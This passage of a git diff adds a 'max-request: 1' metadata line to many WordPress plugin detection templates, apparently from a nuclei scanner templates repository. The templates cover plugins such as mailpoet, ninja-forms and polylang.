+++ b/http/technologies/wordpress/plugins/mailpoet.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailpoet/
   metadata:
+    max-request: 1
     plugin_namespace: mailpoet
     wpscan: https://wpscan.com/plugin/mailpoet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml
index 7c15702305..d87d456a8c 100644
--- a/http/technologies/wordpress/plugins/maintenance.yaml
+++ b/http/technologies/wordpress/plugins/maintenance.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/maintenance/
   metadata:
+    max-request: 1
     plugin_namespace: maintenance
     wpscan: https://wpscan.com/plugin/maintenance
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml
index 5ce87e6c71..aa9153241e 100644
--- a/http/technologies/wordpress/plugins/mainwp-child.yaml
+++ b/http/technologies/wordpress/plugins/mainwp-child.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mainwp-child/
   metadata:
+    max-request: 1
     plugin_namespace: mainwp-child
     wpscan: https://wpscan.com/plugin/mainwp-child
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml
index c342e6b45a..09641796a3 100644
--- a/http/technologies/wordpress/plugins/malcare-security.yaml
+++ b/http/technologies/wordpress/plugins/malcare-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/malcare-security/
   metadata:
+    max-request: 1
     plugin_namespace: malcare-security
     wpscan: https://wpscan.com/plugin/malcare-security
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml
index e95041f555..28b70d09bf 100644
--- a/http/technologies/wordpress/plugins/megamenu.yaml
+++ b/http/technologies/wordpress/plugins/megamenu.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/megamenu/
   metadata:
+    max-request: 1
     plugin_namespace: megamenu
     wpscan: https://wpscan.com/plugin/megamenu
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml
index 879a0d1c12..b43c10ed7a 100644
--- a/http/technologies/wordpress/plugins/members.yaml
+++ b/http/technologies/wordpress/plugins/members.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/members/
   metadata:
+    max-request: 1
     plugin_namespace: members
     wpscan: https://wpscan.com/plugin/members
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml
index 985f5d373a..eb7e78bc7f 100644
--- a/http/technologies/wordpress/plugins/meta-box.yaml
+++ b/http/technologies/wordpress/plugins/meta-box.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/meta-box/
   metadata:
+    max-request: 1
     plugin_namespace: meta-box
     wpscan: https://wpscan.com/plugin/meta-box
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml
index bbc305b8de..3da2ea50e1 100644
--- a/http/technologies/wordpress/plugins/ml-slider.yaml
+++ b/http/technologies/wordpress/plugins/ml-slider.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ml-slider/
   metadata:
+    max-request: 1
     plugin_namespace: ml-slider
     wpscan: https://wpscan.com/plugin/ml-slider
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml
index 7e3e4e2d7e..7a58c58f63 100644
--- a/http/technologies/wordpress/plugins/newsletter.yaml
+++ b/http/technologies/wordpress/plugins/newsletter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/newsletter/
   metadata:
+    max-request: 1
     plugin_namespace: newsletter
     wpscan: https://wpscan.com/plugin/newsletter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
index 17ea142c46..5f99b8cac8 100644
--- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
+++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/nextend-facebook-connect/
   metadata:
+    max-request: 1
     plugin_namespace: nextend-facebook-connect
     wpscan: https://wpscan.com/plugin/nextend-facebook-connect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
index 953e4ab3d8..b08876df04 100644
--- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml
+++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/nextgen-gallery/
   metadata:
+    max-request: 1
     plugin_namespace: nextgen-gallery
     wpscan: https://wpscan.com/plugin/nextgen-gallery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml
index 92107fa69c..3f68dffe06 100644
--- a/http/technologies/wordpress/plugins/ninja-forms.yaml
+++ b/http/technologies/wordpress/plugins/ninja-forms.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ninja-forms/
   metadata:
+    max-request: 1
     plugin_namespace: ninja-forms
     wpscan: https://wpscan.com/plugin/ninja-forms
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml
index 5e1fe4ef5c..34f9bde1d6 100644
--- a/http/technologies/wordpress/plugins/ocean-extra.yaml
+++ b/http/technologies/wordpress/plugins/ocean-extra.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ocean-extra/
   metadata:
+    max-request: 1
     plugin_namespace: ocean-extra
     wpscan: https://wpscan.com/plugin/ocean-extra
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
index 74fb3e6010..d9f645328f 100644
--- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
+++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/official-facebook-pixel/
   metadata:
+    max-request: 1
     plugin_namespace: official-facebook-pixel
     wpscan: https://wpscan.com/plugin/official-facebook-pixel
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
index b9f70ba555..8a1196fc9f 100644
--- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml
+++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/one-click-demo-import/
   metadata:
+    max-request: 1
     plugin_namespace: one-click-demo-import
     wpscan: https://wpscan.com/plugin/one-click-demo-import
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml
index 6486c02c9a..05025452b7 100644
--- a/http/technologies/wordpress/plugins/optinmonster.yaml
+++ b/http/technologies/wordpress/plugins/optinmonster.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/optinmonster/
   metadata:
+    max-request: 1
     plugin_namespace: optinmonster
     wpscan: https://wpscan.com/plugin/optinmonster
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml
index 81f58198d3..1db1b57708 100644
--- a/http/technologies/wordpress/plugins/otter-blocks.yaml
+++ b/http/technologies/wordpress/plugins/otter-blocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/otter-blocks/
   metadata:
+    max-request: 1
     plugin_namespace: otter-blocks
     wpscan: https://wpscan.com/plugin/otter-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml
index 3743307dbc..dafe6974f6 100644
--- a/http/technologies/wordpress/plugins/password-protected.yaml
+++ b/http/technologies/wordpress/plugins/password-protected.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/password-protected/
   metadata:
+    max-request: 1
     plugin_namespace: password-protected
     wpscan: https://wpscan.com/plugin/password-protected
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml
index a4c6980041..ba05fb1e16 100644
--- a/http/technologies/wordpress/plugins/pdf-embedder.yaml
+++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pdf-embedder/
   metadata:
+    max-request: 1
     plugin_namespace: pdf-embedder
     wpscan: https://wpscan.com/plugin/pdf-embedder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
index e085f30e5a..a038adac53 100644
--- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pinterest-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: pinterest-for-woocommerce
     wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml
index adf3387ddb..7f98d822a8 100644
--- a/http/technologies/wordpress/plugins/pixelyoursite.yaml
+++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pixelyoursite/
   metadata:
+    max-request: 1
     plugin_namespace: pixelyoursite
     wpscan: https://wpscan.com/plugin/pixelyoursite
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml
index eb6e1aaa5d..89602f4264 100644
--- a/http/technologies/wordpress/plugins/polylang.yaml
+++ b/http/technologies/wordpress/plugins/polylang.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/polylang/
   metadata:
+    max-request: 1
     plugin_namespace: polylang
     wpscan: https://wpscan.com/plugin/polylang
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml
index b3c83cd0bf..2f6513ca42 100644
--- a/http/technologies/wordpress/plugins/popup-builder.yaml
+++ b/http/technologies/wordpress/plugins/popup-builder.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-builder/
   metadata:
+    max-request: 1
     plugin_namespace: popup-builder
     wpscan: https://wpscan.com/plugin/popup-builder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml
index 96d8bd6aca..982306b13c 100644
--- a/http/technologies/wordpress/plugins/popup-maker.yaml
+++ b/http/technologies/wordpress/plugins/popup-maker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-maker/
   metadata:
+    max-request: 1
     plugin_namespace: popup-maker
     wpscan: https://wpscan.com/plugin/popup-maker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml
index 85955ac95e..fdcac13b56 100644
--- a/http/technologies/wordpress/plugins/post-smtp.yaml
+++ b/http/technologies/wordpress/plugins/post-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/post-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: post-smtp
     wpscan: https://wpscan.com/plugin/post-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml
index a81fc892ca..fc316f9f7a 100644
--- a/http/technologies/wordpress/plugins/post-types-order.yaml
+++ b/http/technologies/wordpress/plugins/post-types-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/post-types-order/
   metadata:
+    max-request: 1
     plugin_namespace: post-types-order
     wpscan: https://wpscan.com/plugin/post-types-order
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
index d9c6052cd7..975b63f5de 100644
--- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
+++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/premium-addons-for-elementor/
   metadata:
+    max-request: 1
     plugin_namespace: premium-addons-for-elementor
     wpscan: https://wpscan.com/plugin/premium-addons-for-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml
index afc1141e0c..5065659e82 100644
--- a/http/technologies/wordpress/plugins/pretty-link.yaml
+++ b/http/technologies/wordpress/plugins/pretty-link.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pretty-link/
   metadata:
+    max-request: 1
     plugin_namespace: pretty-link
     wpscan: https://wpscan.com/plugin/pretty-link
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
index d44add9ca6..732ffbc4eb 100644
--- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-captcha/
   metadata:
+    max-request: 1
     plugin_namespace: really-simple-captcha
     wpscan: https://wpscan.com/plugin/really-simple-captcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
index 20ba5c2e16..12dffeb534 100644
--- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-ssl/
   metadata:
+    max-request: 1
     plugin_namespace: really-simple-ssl
     wpscan: https://wpscan.com/plugin/really-simple-ssl
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml
index cbcf3cf09d..ae0e76c4bb 100644
--- a/http/technologies/wordpress/plugins/redirection.yaml
+++ b/http/technologies/wordpress/plugins/redirection.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/redirection/
   metadata:
+    max-request: 1
     plugin_namespace: redirection
     wpscan: https://wpscan.com/plugin/redirection
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml
index 3311d42c94..b1718d1ccb 100644
--- a/http/technologies/wordpress/plugins/redux-framework.yaml
+++ b/http/technologies/wordpress/plugins/redux-framework.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/redux-framework/
   metadata:
+    max-request: 1
     plugin_namespace: redux-framework
     wpscan: https://wpscan.com/plugin/redux-framework
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
index 46c1c22805..7543ac1d55 100644
--- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/regenerate-thumbnails/
   metadata:
+    max-request: 1
     plugin_namespace: regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml
index 7c13b8d2a4..4a29cecdb0 100644
--- a/http/technologies/wordpress/plugins/safe-svg.yaml
+++ b/http/technologies/wordpress/plugins/safe-svg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/safe-svg/
   metadata:
+    max-request: 1
     plugin_namespace: safe-svg
     wpscan: https://wpscan.com/plugin/safe-svg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
index 53b30ba721..be281d91e6 100644
--- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
+++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/seo-by-rank-math/
   metadata:
+    max-request: 1
     plugin_namespace: seo-by-rank-math
     wpscan: https://wpscan.com/plugin/seo-by-rank-math
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index 9555d7aebd..6bd95ec077 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-cachepress/
   metadata:
+    max-request: 1
     plugin_namespace: sg-cachepress
     wpscan: https://wpscan.com/plugin/sg-cachepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index 180266f448..1fd64a5279 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-security/
   metadata:
+    max-request: 1
     plugin_namespace: sg-security
     wpscan: https://wpscan.com/plugin/sg-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
index 17584cd064..1bb9a283ce 100644
--- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
+++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/shortcodes-ultimate/
   metadata:
+    max-request: 1
     plugin_namespace: shortcodes-ultimate
     wpscan: https://wpscan.com/plugin/shortcodes-ultimate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
index 015fb97043..7836d9554c 100644
--- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
+++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/shortpixel-image-optimiser/
   metadata:
+    max-request: 1
     plugin_namespace: shortpixel-image-optimiser
     wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
index 1d5224b457..ccd72e427a 100644
--- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/simple-custom-post-order/
   metadata:
+    max-request: 1
     plugin_namespace: simple-custom-post-order
     wpscan: https://wpscan.com/plugin/simple-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml
index aafd6c6a38..3622b2c6b3 100644
--- a/http/technologies/wordpress/plugins/siteguard.yaml
+++ b/http/technologies/wordpress/plugins/siteguard.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/siteguard/
   metadata:
+    max-request: 1
     plugin_namespace: siteguard
     wpscan: https://wpscan.com/plugin/siteguard
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
index e10ab985da..9eff765d61 100644
--- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml
+++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/siteorigin-panels/
   metadata:
+    max-request: 1
     plugin_namespace: siteorigin-panels
     wpscan: https://wpscan.com/plugin/siteorigin-panels
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml
index 9881b591ae..c856e1fa9e 100644
--- a/http/technologies/wordpress/plugins/smart-slider-3.yaml
+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/smart-slider-3/
   metadata:
+    max-request: 1
     plugin_namespace: smart-slider-3
     wpscan: https://wpscan.com/plugin/smart-slider-3
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
index 0480b4b0e6..008440cc58 100644
--- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
+++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/so-widgets-bundle/
   metadata:
+    max-request: 1
     plugin_namespace: so-widgets-bundle
     wpscan: https://wpscan.com/plugin/so-widgets-bundle
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
index 26d525386b..410776862f 100644
--- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
+++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/
   metadata:
+    max-request: 1
     plugin_namespace: stops-core-theme-and-plugin-updates
     wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
index 3920c5cf56..f210a2a2f9 100644
--- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml
+++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sucuri-scanner/
   metadata:
+    max-request: 1
     plugin_namespace: sucuri-scanner
     wpscan: https://wpscan.com/plugin/sucuri-scanner
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml
index f556786f5a..f1dd1bf150 100644
--- a/http/technologies/wordpress/plugins/svg-support.yaml
+++ b/http/technologies/wordpress/plugins/svg-support.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/svg-support/
   metadata:
+    max-request: 1
     plugin_namespace: svg-support
     wpscan: https://wpscan.com/plugin/svg-support
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
index 844e3d19a0..a9ec913599 100644
--- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
+++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/table-of-contents-plus/
   metadata:
+    max-request: 1
     plugin_namespace: table-of-contents-plus
     wpscan: https://wpscan.com/plugin/table-of-contents-plus
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml
index eb0f02f602..d38aeb0279 100644
--- a/http/technologies/wordpress/plugins/tablepress.yaml
+++ b/http/technologies/wordpress/plugins/tablepress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/tablepress/
   metadata:
+    max-request: 1
     plugin_namespace: tablepress
     wpscan: https://wpscan.com/plugin/tablepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
index 755efd53fa..07c43b9d80 100644
--- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
+++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/taxonomy-terms-order/
   metadata:
+    max-request: 1
     plugin_namespace: taxonomy-terms-order
     wpscan: https://wpscan.com/plugin/taxonomy-terms-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml
index 0403bb4e72..83a849e11e 100644
--- a/http/technologies/wordpress/plugins/the-events-calendar.yaml
+++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/the-events-calendar/
   metadata:
+    max-request: 1
     plugin_namespace: the-events-calendar
     wpscan: https://wpscan.com/plugin/the-events-calendar
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml
index cd2632ea05..c6100637d9 100644
--- a/http/technologies/wordpress/plugins/themeisle-companion.yaml
+++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/themeisle-companion/
   metadata:
+    max-request: 1
     plugin_namespace: themeisle-companion
     wpscan: https://wpscan.com/plugin/themeisle-companion
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
index b5f8b822c7..1f188b66c6 100644
--- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml
+++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/tinymce-advanced/
   metadata:
+    max-request: 1
     plugin_namespace: tinymce-advanced
     wpscan: https://wpscan.com/plugin/tinymce-advanced
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
index 85aaf7ff16..2c7b16cb44 100644
--- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
+++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/translatepress-multilingual/
   metadata:
+    max-request: 1
     plugin_namespace: translatepress-multilingual
     wpscan: https://wpscan.com/plugin/translatepress-multilingual
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
index 0af322b728..9d6afa8d3f 100644
--- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: ultimate-addons-for-gutenberg
